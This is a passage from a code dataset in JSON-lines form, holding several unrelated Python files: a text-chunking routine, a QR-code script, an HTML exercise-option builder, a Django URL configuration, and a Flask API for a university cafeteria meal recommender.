bool:\n            if len(partitions) == 0:\n                return False\n\n            for par in partitions:\n                cluster = \"\\n\\n\".join([texts[p] for p in par])\n                cluster_len = self.get_num_of_tokens(cluster)\n                if cluster_len >= thresh:\n                    return False\n\n            return True\n\n        while not is_partition_correct(partitions, texts, config.CHUNK_SIZE):\n            partitions = community.louvain_communities(\n                G=similarity_matrix,\n                resolution=resolution,\n                seed=1)\n            resolution += resolution_step\n        logger.info(f\"successfully partitioned text into {partitions}\")\n\n        return partitions\n\n# gcloud init:\n# https://cloud.google.com/sdk/docs/initializing\n# https://cloud.google.com/sdk/gcloud/reference/auth/activate-service-account#ACCOUNT\n","repo_name":"yang0369/LLM_summarization","sub_path":"src/load_and_chunk.py","file_name":"load_and_chunk.py","file_ext":"py","file_size_in_byte":12153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"}
{"seq_id":"6022835943","text":"import pyqrcode \n\ndef qr_code():\n    s='https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley'\n    d=pyqrcode.create(s)\n    d.png('my_img.png',scale=6)\n    print('Code Executed Properly')\n\nif __name__ == '__main__':\n    qr_code()","repo_name":"nikhilsahu2002/Python-Project-File","sub_path":"py_qrcode.py","file_name":"py_qrcode.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"26101248795","text":"import html\n\ndef format_options(row):\n    \n    if row['type'] == 'select_word':\n
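        # select_word: build an inline <select> element; its onchange handler checks the chosen option against the answer\n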
        answer = row['answer']\n        onchange = f\"myFunction('{answer}', 's{row.name}', 'p{row.name}')\"\n        html_open = f'<select id=\"s{row.name}\" onchange=\"{onchange}\">'\n        opts_open = '<option value=\"\" selected disabled></option>'\n        options = ''.join([f'<option value=\"{row[\"options\"][i]}\">{row[\"options\"][i]}</option>'\n                           for i in range(len(row['options']))])\n        html_close = '</select>'\n        dropdown = html_open + opts_open + options + html_close\n        return dropdown\n
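\n    # noun_phrases: same dropdown, prefixed with the noun phrase it completes\n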
    if row['type'] == 'noun_phrases':\n        answer = row['answer']\n        onchange = f\"myFunction('{answer}', 's{row.name}', 'p{row.name}')\"\n        phrase = f'{row[\"object\"]} '\n        html_open = f'<select id=\"s{row.name}\" onchange=\"{onchange}\">'\n        opts_open = '<option value=\"\" selected disabled></option>'\n        options = ''.join([f'<option value=\"{row[\"options\"][i]}\">{row[\"options\"][i]}</option>'\n                           for i in range(len(row['options']))])\n        html_close = '</select>'\n        dropdown = phrase + html_open + opts_open + options + html_close\n        return dropdown\n\n    if row['type'] == 'select_sent':\n        # whole-sentence options rendered as radio buttons; quotes are HTML-escaped\n        # so they survive inside the inline onchange attribute\n        answer = row['answer'].replace(\"'\", '&#39;').replace('\"', '&quot;')\n        options = [opt.replace(\"'\", '&#39;').replace('\"', '&quot;') for opt in row['options']]\n        html_open = '<div class=\"form-check\">'\n        html_close = '</div>'\n
        input_class = f'input class=\"form-check-input\" type=\"radio\"'\n        label_class = f'label class=\"form-check-label\"'\n        dropdown = ''.join([f'''{html_open}\n                            <{input_class} id=\"r{row.name}-{i}\" name=\"rname{row.name}\" \n                            onchange=\\'myFunction(\\\"{answer}\\\", \\\"r{row.name}-{i}\\\", \\\"p{row.name}\\\")\\'\n                            value=\\\"{options[i]}\\\">\n                            <{label_class} for=\"r{row.name}-{i}\">{row['options'][i]}</label>\n                            {html_close}'''\n                           for i in range(len(row['options']))]) \n        return dropdown\n\n    if row['type'] == 'missing_word':\n        answer = row['answer']\n        onchange = f\"myFunction('{answer}', 't{row.name}', 'p{row.name}')\"\n        input_field = f'<input type=\"text\" id=\"t{row.name}\" onchange=\"{onchange}\">'\n        return input_field\n\n","repo_name":"artefucktor/english_exercises","sub_path":"flask_app/format_options.py","file_name":"format_options.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
{"seq_id":"24758667029","text":"from django.conf.urls.defaults import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport os\nROOT_PATH = os.path.dirname(__file__)\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Example:\n    # (r'^mysite/', include('mysite.foo.urls')),\n\n\t(r'^polls/', include('polls.urls')),\n\t(r'^admin/', include(admin.site.urls)),\n\n\t(r'^wizards/$', 'wizardry.views.index'),\n\t(r'^wizards/(?P<wizard_id>\\d+)/$', 'wizardry.views.detail'),\n\t(r'^json/$', 'wizardry.views.json'),\n    (r'^static/(?P<path>.*)$', 'django.views.static.serve'),\n\n    # Uncomment the admin/doc line below and add 'django.contrib.admindocs'\n    # to INSTALLED_APPS to enable admin documentation:\n    # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n    # Uncomment the next line to enable the admin:\n    # (r'^admin/', include(admin.site.urls)),\n)","repo_name":"SebastianStadil/Wizardry","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
{"seq_id":"9884172234","text":"import os\nimport sys\n\nimport flask\nfrom flask import request, jsonify\n\nparent_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\nsys.path.append(parent_path)\nsys.path.append(\"~/tuk.mensa-kl-conv-ai/src/recommender.recommender\")\nfrom src.recommender.recommender import Recommender\nfrom src.recommender.data import clean_title_additives, get_meal_title_additives\n\nWEEKDAYS = {\n    1: \"Montag\",\n    2: \"Dienstag\",\n    3: \"Mittwoch\",\n    4: \"Donnerstag\",\n    5: \"Freitag\",\n    6: \"Samstag\",\n    7: \"Sonntag\"\n}\n\nSTR_WEEKDAYS_DE = ['Montag', 'Dienstag', 'Mittwoch', 'Donnerstag', 'Freitag', 'Samstag', 'Sonntag']\n\napp = flask.Flask(__name__)\nr = Recommender()\n\n\n@app.route('/')\ndef index():\n    pass\n\n\n@app.route(\"/userexists\", methods=['POST'])\ndef user_exists():\n    data = request.get_json()\n    user_id = data[\"user_id\"]\n    if r.users.user_exists(user_id):\n        exists = 1\n    else:\n        exists = 0\n    print(\"User exists: \" + str(exists))\n    return jsonify({\"user_exists\": exists})\n\n\n@app.route(\"/usernoprofile\", methods=[\"POST\"])\ndef user_wants_no_profile():\n    data = request.get_json()\n    user_id = data[\"user_id\"]\n    if r.users.wants_no_profile(user_id):\n        no_profile = 1\n    else:\n        no_profile = 0\n    print(\"User wants no profile: \" + str(no_profile))\n    return jsonify({\"no_profile\": no_profile})\n\n\n@app.route(\"/setuserprofile\", 
methods=[\"POST\"])\ndef set_user_profile():\n data = request.get_json()\n user_id = data[\"user_id\"]\n r.users.set_wants_profile(user_id)\n return \"Set user wants profile\"\n\n\n@app.route(\"/setusernoprofile\", methods=[\"POST\"])\ndef set_user_no_profile():\n data = request.get_json()\n user_id = data[\"user_id\"]\n r.users.set_wants_no_profile(user_id)\n return \"Set user wants no profile\"\n\n\n@app.route(\"/prediction\", methods=['POST'])\ndef predict():\n week = False\n data = request.get_json()\n user_id = data[\"user_id\"]\n try:\n day = data[\"day\"]\n if day == 8:\n day = [1, 2, 3, 4, 5]\n week = True\n except KeyError:\n day = r.day\n if not week:\n predictions = []\n locations = []\n recommendation = r.predict(str(user_id), day=day)\n menu = r.menu.get_food_per_day(WEEKDAYS[day])\n if menu is None:\n predictions = []\n else:\n recommendation = [(menu.title.values[i], recommendation[i][1], menu[\"loc\"].values[i]) for i in\n range(len(recommendation))]\n recommendation = sorted(recommendation, key=lambda x: x[1], reverse=True)\n filtered_recommendation = []\n for meal in recommendation:\n if not r.filter_additives(user_id, get_meal_title_additives(meal[0])):\n filtered_recommendation.append(meal)\n # current_day = []\n # for prediction in recommendation:\n # current_day.append(clean_title_additives(prediction[0]))\n if filtered_recommendation != []:\n predictions.append([clean_title_additives(filtered_recommendation[0][0])])\n locations.append([filtered_recommendation[0][2]])\n\n answer = {}\n answer[\"locations\"] = locations\n answer[\"meals\"] = predictions\n answer[\"day\"] = day\n return jsonify(answer)\n else:\n predictions = []\n locations = []\n days = []\n for d in day:\n current_day = []\n recommendation = r.predict(str(user_id), day=d)\n menu = r.menu.get_food_per_day(WEEKDAYS[d])\n if menu is None:\n continue\n else:\n recommendation = [(menu.title.values[i], recommendation[i][1], menu[\"loc\"].values[i]) for i in\n range(len(recommendation))]\n recommendation = sorted(recommendation, key=lambda x: x[1], reverse=True)\n filtered_recommendation = []\n for meal in recommendation:\n if not r.filter_additives(user_id, get_meal_title_additives(meal[0])):\n filtered_recommendation.append(meal)\n if filtered_recommendation != []:\n current_day.append(clean_title_additives(filtered_recommendation[0][0]))\n locations.append([filtered_recommendation[0][2]])\n # for prediction in recommendation:\n # current_day.append(clean_title_additives(prediction[0]))\n days.append(d)\n predictions.append(current_day)\n answer = {}\n answer[\"locations\"] = locations\n answer[\"meals\"] = predictions\n answer[\"day\"] = days\n return jsonify(answer)\n\n\n@app.route(\"/addrating\", methods=[\"POST\"])\ndef add_rating():\n data = request.get_json()\n user_id = data[\"user_id\"]\n m_id = data[\"m_id\"]\n rating = data[\"rating\"]\n r.users.update_rating(user_id, m_id, rating)\n r.update_user_specific_data(user_id)\n return \"Rating added!\"\n\n\n@app.route(\"/addadditives\", methods=[\"POST\"])\ndef add_additives():\n data = request.get_json()\n user_id = data[\"user_id\"]\n additives = data[\"additives\"]\n for additive in additives:\n r.users.update_user_additives(user_id, additive)\n return \"Additives added!\"\n\n\n@app.route(\"/getmeals\", methods=[\"POST\"])\ndef get_meals():\n week = False\n data = request.get_json()\n try:\n day = data[\"day\"]\n if day == 8:\n week = True\n except KeyError:\n day = r.day\n if week:\n menu = r.menu.df_menus.loc[:, 'title'].tolist()\n locs = 
r.menu.df_menus[\"loc\"].values\n else:\n try:\n menu = r.menu.get_food_per_day(WEEKDAYS[day]).loc[:, \"title\"]\n locs = r.menu.get_food_per_day(WEEKDAYS[day])[\"loc\"].values\n except AttributeError:\n menu = []\n meals = []\n locations = []\n for k, meal in enumerate(menu):\n meals.append([clean_title_additives(meal)])\n locations.append([locs[k]])\n answer = {}\n answer[\"locations\"] = locations\n answer[\"meals\"] = meals\n answer[\"day\"] = day\n return jsonify(answer)\n\n\n# @app.route(\"/getmeals\", methods=['POST'])\n# def get_meals():\n# data = request.get_json()\n# time = data[\"day\"]\n# if time == 'heute':\n# today_weekday = STR_WEEKDAYS_DE[datetime.datetime.now().weekday()]\n# return jsonify({'msg': r.menu.get_food_per_day(today_weekday).loc[:, 'title'].tolist()})\n# elif time == 'morgen':\n# tomorrow_weekday = STR_WEEKDAYS_DE[datetime.datetime.now().weekday()+1]\n# return jsonify({'msg': r.menu.get_food_per_day(tomorrow_weekday).loc[:, 'title'].tolist()})\n# elif time == 'woche':\n# return jsonify({'msg': r.menu.df_menus.loc[:, 'title'].tolist()})\n# else:\n# return jsonify({'error': \"Invalid value for attribute